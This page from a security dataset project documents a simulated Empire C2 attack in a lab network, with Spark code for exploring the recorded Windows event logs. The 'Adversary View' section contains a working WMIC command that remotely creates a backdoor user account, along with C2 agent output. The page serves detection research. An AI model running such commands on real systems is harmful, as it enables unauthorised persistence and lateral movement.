.ipynb .pdf

repository open issue suggest edit

Binder Colab Live Code

Contents

Empire Remote WMIC Add User

Metadata

Author	Roberto Rodriguez @Cyb3rWard0g
Creation Date	2020/09/14
Modification Date	2020/09/22
Tactics	[‘TA0002’, ‘TA0008’]
Techniques	[‘T1047’]
Tags	[‘WMI IWbemServices ExecMethod’, ‘User Backdoor’]

Dataset Description

This dataset represents an adversary remotely executing code via WMI to ad a backdoor user on the target system. This dataset focuses on the use of the WMI Win32_Process class and method Create to execute code remotely.

Datasets Downloads

Dataset Type	Link
Host	https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/empire_wmic_add_user_backdoor.zip

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author	Name	Link

Simulation Plan

Environment	Tool Type	Module
Mordor shire	C2	shell

Adversary View

(Empire: agents) > 
[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5
[*] New agent 6Z78CY25 checked in
[+] Initial agent 6Z78CY25 from 172.18.39.5 now active (Slack)
[*] Sending agent (stage 2) to 6Z78CY25 at 172.18.39.5
agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
KFL6CMNZ ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         7584   5/0.0    2020-09-14 11:33:59  http            
YGBLW8EM ps 172.18.39.5     WORKSTATION5      *THESHIRE\wardog        powershell         8924   5/0.0    2020-09-14 11:40:53  http            
UBCKLYFA ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5412   5/0.0    2020-09-14 11:57:16  http            

6Z78CY25 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         9564   5/0.0    2020-09-14 12:02:08  http            

(Empire: agents) > interact 6Z78CY25
(Empire: 6Z78CY25) > 
(Empire: 6Z78CY25) > shell wmic /node:WORKSTATION6 process call create "net user /add backdoor pa$$w0rd1"
[*] Tasked 6Z78CY25 to run TASK_SHELL
[*] Agent 6Z78CY25 tasked with task ID 1
(Empire: 6Z78CY25) > 
Executing (Win32_Process)->Create()

Method execution successful.

Out Parameters:
instance of __PARAMETERS
{
  ProcessId = 7768;
  ReturnValue = 0;
};

..Command execution completed.

(Empire: 6Z78CY25) >

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/empire_wmic_add_user_backdoor.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")

[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)

+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Security                                |5447   |1430 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |1426 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |1361 |
|WORKSTATION5.theshire.local|Security                                |5158   |1337 |
|WORKSTATION5.theshire.local|Security                                |5154   |1297 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |1139 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |1115 |
|WORKSTATION5.theshire.local|Security                                |4658   |534  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |276  |
|WORKSTATION5.theshire.local|Security                                |4656   |270  |
|WORKSTATION5.theshire.local|Security                                |4690   |264  |
|WORKSTATION5.theshire.local|Security                                |4663   |257  |
|WORKSTATION5.theshire.local|Security                                |4703   |120  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |113  |
|WORKSTATION5.theshire.local|Windows PowerShell                      |800    |108  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |11     |95   |
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |90   |
|WORKSTATION5.theshire.local|Security                                |5156   |84   |
|WORKSTATION6.theshire.local|Security                                |4658   |67   |
|MORDORDC.theshire.local    |Security                                |5156   |54   |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows

Empire Invoke Execute MSBuild Mimikatz Netlogon Unauthenticated NetrServerAuthenticate2